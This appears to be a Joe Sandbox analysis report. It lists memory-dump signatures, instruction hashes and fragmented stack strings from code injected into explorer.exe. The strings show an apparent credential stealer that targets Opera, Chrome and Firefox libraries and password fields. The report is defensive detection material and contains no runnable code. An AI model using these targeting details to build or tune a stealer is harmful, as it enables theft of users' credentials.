                                                                                                                              • Instruction ID: 8bbc079cc75084612bf35628aab4b9559e531bf521d2d001471935a3240f1d4f
                                                                                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                              • Instruction Fuzzy Hash: EA41B170A18B088FDB14DF88A44A7BD7BF2FB48704F00425EE449DB245DBB5AD858BD6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                              • API String ID: 0-1539916866
                                                                                                                              • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                              • Instruction ID: 822169108511317e0bb273fbb95c724564308851a8cf77840d89f4fb45652886
                                                                                                                              • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                              • Instruction Fuzzy Hash: F341B070A1CB08CFDB18DF98A8467AD7BE2FB88740F00425EE509D3245DBB5AD458BD6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                              • API String ID: 0-355182820
                                                                                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction ID: e875c133d629b25ad65ce56690c318fea0b59feaaf98c8327ee63a696eedda0c
                                                                                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction Fuzzy Hash: 24C16B74618B088FC758EF24D486AAAF3E5FB98304F40472EA59ACB250DF30B555CBC6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                              • API String ID: 0-355182820
                                                                                                                              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction ID: d7bc2aaabd99402aad12d49d61c19c4054cf88bcbb297de50cfec25e30547d97
                                                                                                                              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                              • Instruction Fuzzy Hash: 04C15C7521CB098FC758EF68C4866AAF7E1FB94304F40472EA59AC7210DF70B515CB86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                              • API String ID: 0-97273177
                                                                                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction ID: 2ef94e2a6d1f53c4363b9e938e6060ac3bfd007b5348b7cc387a9e21a9c1163f
                                                                                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction Fuzzy Hash: 4351C6315187488FD709DF14D8816AAB7E5FBC5704F501A2EF9CBCB242DBB49946CB82
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                              • API String ID: 0-97273177
                                                                                                                              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction ID: 0f78ce648794ceb87b37f88ac5c675c14725325f5f18199b6e517ce191dd973d
                                                                                                                              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                              • Instruction Fuzzy Hash: E651B13561C7488FD709CF18D8816AAB7E5FB85700F505A2FF8CB87251DBB4A906CB82
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction ID: ca5b59314febc9182f24780965133f0594656e63c039fe8d677aec723a3f4ba1
                                                                                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction Fuzzy Hash: DCC1A074618A194FC758EF68D496AAAF7E1FB98300F81436DA44ECB251DF30EA41CBC5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction ID: 8df902bb4f3718bbf289b35c2b7552f038da19b7bb3f5061971c58910b9c0b01
                                                                                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction Fuzzy Hash: 2BC1A074618A194FC758EF68D496AAAF7E1FB98300F81436DA44ECB251DF30AA41CBC5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction ID: c5a5ffbfa9fbc92efcf1661c235260898b534912faa11ddf48fee998eaf45174
                                                                                                                              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                              • Instruction Fuzzy Hash: 23C1917461CA194FC758EF68D496AAAB3E1FF98300F51832E944EC7255DF70EA01CB85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                              • API String ID: 0-639201278
                                                                                                                              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction ID: bf57deae58521988c863eda96ac48b029c9857181e3dace75e6023dbd2f1a3e8
                                                                                                                              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                              • Instruction Fuzzy Hash: 48C1927461CA194FC758EF68D496AAAB3E1FF98300F51832E944EC7255DF70EA01CB85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction ID: fc620b2a6aa651385265aa28c3fe05e71cb68e2a41d0a07c1234ca466f362f40
                                                                                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction Fuzzy Hash: 06A180706187488FDB19DF68D445BEEB7E2FF98300F40462DE48AD7292EF7095858789
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction ID: 7d6ca4dc05be438c83d2ae5d73f1f75c621c9afbb29296709b190c535a2a52fd
                                                                                                                              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                              • Instruction Fuzzy Hash: ECA19F7061CB488BDB19EF689445BEEB7E1FF88300F40862EE48AD7255EE7095458785
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction ID: 7db00dd0ae4306eb86260293b2b9c5be042d9b1c2ca3bda4817e4967b01cb5bd
                                                                                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction Fuzzy Hash: 89918F706187488FDB18DFA8D444BEEB7E2FF98300F40462DE48AD7252EB709585CB89
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                              • API String ID: 0-2058692283
                                                                                                                              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction ID: 1f35ce07689f6d90386026dfb8c301356f807c4c603411bc9c227ac46f29eb97
                                                                                                                              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                              • Instruction Fuzzy Hash: 6C918E7061CB488BDB19DFA8D444BEEB7F1FB98300F40862EE48AD7295EF7095458789
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $.$e$n$v
                                                                                                                              • API String ID: 0-1849617553
                                                                                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction ID: d0eb0c89c6f4395638b71666791e236aaabf2dd24730a1bd785ddf8230c7f63f
                                                                                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction Fuzzy Hash: DF71B235618B498FD758DFA8D4857AAB7F5FF98304F00062EE44ACB221EF70E9458B85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $.$e$n$v
                                                                                                                              • API String ID: 0-1849617553
                                                                                                                              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction ID: 5447bd94f1333e550fda85b01f28e736e237bdd01d19fd6c0473fd5028f5bf8b
                                                                                                                              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                              • Instruction Fuzzy Hash: 53719D3161CB498FD758EFA8C4856AAB7F1FF98304F00462FE44AC7225EB71A9458B85
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                              • API String ID: 0-1970020201
                                                                                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction ID: 5ed9bd7019f3ab79a83546b9593abe6e3487eeeefaf16f202565d31e593aa16c
                                                                                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction Fuzzy Hash: 7B5150B0914B4C8FDB54DF64C0456EEB7F1FF58301F40462EA59AE7254EF30A5818B89
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                              • API String ID: 0-1970020201
                                                                                                                              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction ID: b676c7e1834f04fc397b11b561e3fb790d54b28f195c45fba3403b63d1865aa2
                                                                                                                              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                              • Instruction Fuzzy Hash: 9A513AB1918B4C8BDB54DFA8C445AEEB7F1FF58300F40462EE59AE7214EF70A5418B89
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4$\$dll$ion.$vers
                                                                                                                              • API String ID: 0-1610437797
                                                                                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction ID: 582510ddc3b556fc0d31cff99ed0cccf640355029f15d91a7808daf14026eb5e
                                                                                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction Fuzzy Hash: 13418134258B8C8FCBA5EF2898457EAB3E4FF98341F41462E984ECB240EF30D5458782
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4$\$dll$ion.$vers
                                                                                                                              • API String ID: 0-1610437797
                                                                                                                              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction ID: 47fe2925e404af39cab450d4f0a868c8eaa11acdee8c475356b62312067ce5dd
                                                                                                                              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                              • Instruction Fuzzy Hash: 2941A23425DB4C8FCBA5EF2898457EAB7E4FB99301F41462E988EC7244EF30D9058782
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                              • API String ID: 0-327345718
                                                                                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction ID: 5fef9a6e1722a15c541baeff15c4de33a10dbf75c73dc7761fdba88fcbda7296
                                                                                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction Fuzzy Hash: E5417E30A18E0D8FCB98EF6880957AD77E2FB5C350F41016EA80EDB244DA31D980CB86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                              • API String ID: 0-327345718
                                                                                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction ID: 3da58361aabf505a78b9add3e75c1bae3efa8fc09da17f6d753783420247f16b
                                                                                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                              • Instruction Fuzzy Hash: 3C415E30A1CE0D8FCF98EF6890957AD77E2FB68340F51466AA90ED7214DE70D9408B86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$el32$h$kern
                                                                                                                              • API String ID: 0-4264704552
                                                                                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction ID: 91a34de3415b891ddcc85c4f080dad5eb1f0af730ed5c7c3120272cd3c764f29
                                                                                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction Fuzzy Hash: 5C418270608B494FD795CF2880843AABBE1FB98340F104A2E959EC7255DF70D985CB41
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$el32$h$kern
                                                                                                                              • API String ID: 0-4264704552
                                                                                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction ID: 9ab40e6d6c8b85abdda7e9cef5e08c7d78024654019d930e73b64352e8a0b391
                                                                                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                              • Instruction Fuzzy Hash: 68418F7060CB498FD7A9CF2884843AAB7E1FB98344F108A6F949EC3265DF70D945CB81
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction ID: 5f676f183b7aa6674ccd1c9a8f0bf26dd8b97432c2a50cb57cbdced91f365d17
                                                                                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction Fuzzy Hash: AD31373451CB886FD71ADF28D485AEAB7D4FB94300F50491EE49BCB252EE30A54ACB43
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction ID: d886f3e498bf36b17bf4498a190b0b8db7894dc7ed4cfdabad9c771ef6ddaf94
                                                                                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                              • Instruction Fuzzy Hash: 8C31D07551CB88AFD76ADB28C4856DAB7D0FB84300F50491EE49BC7256EE30B54ACB43
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction ID: 0cc7ffea33ad8824210328a97774eb36370071b2a906a1d53fd478325af0ed81
                                                                                                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction Fuzzy Hash: 5931017551CB486FD719DF28D485AEAB3D5FB94300F40492EE49BCB242EE30E54ACB42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                                              • API String ID: 0-3434893486
                                                                                                                              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction ID: d34f37da601334d00050b9a0b1461aa2525d06439d4ff94e81510a3083f2f579
                                                                                                                              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                              • Instruction Fuzzy Hash: 0C31EE7551CB48AFD76ADB28C485AEAB7D4FB94300F50491EF49BC3255EE30A50ACA82
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction ID: 69615a4e33b888e3f88876e6f8a53104807cb8d264c94f7db05158f469ea50b3
                                                                                                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction Fuzzy Hash: 75318B74118B088FC784EF289596BAAB7E1FB98200F84567DA84ECF215DF30D985C792
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010835015.00000000107E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_107e0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                                              • API String ID: 0-3136806129
                                                                                                                              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction ID: bfaf1daa3256cb1d8f1d5a8021322db9572e9c30bbc24cf03e114a84a2e49b7e
                                                                                                                              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                              • Instruction Fuzzy Hash: FB317E7411CB488FC784EF688495BAAB7E1FF98200F84467EA44ECB219DF30D945CB96
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4010961093.0000000010930000.00000040.80000000.00040000.00000000.sdmp, Offset: 10930000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_10930000_explorer.jbxd
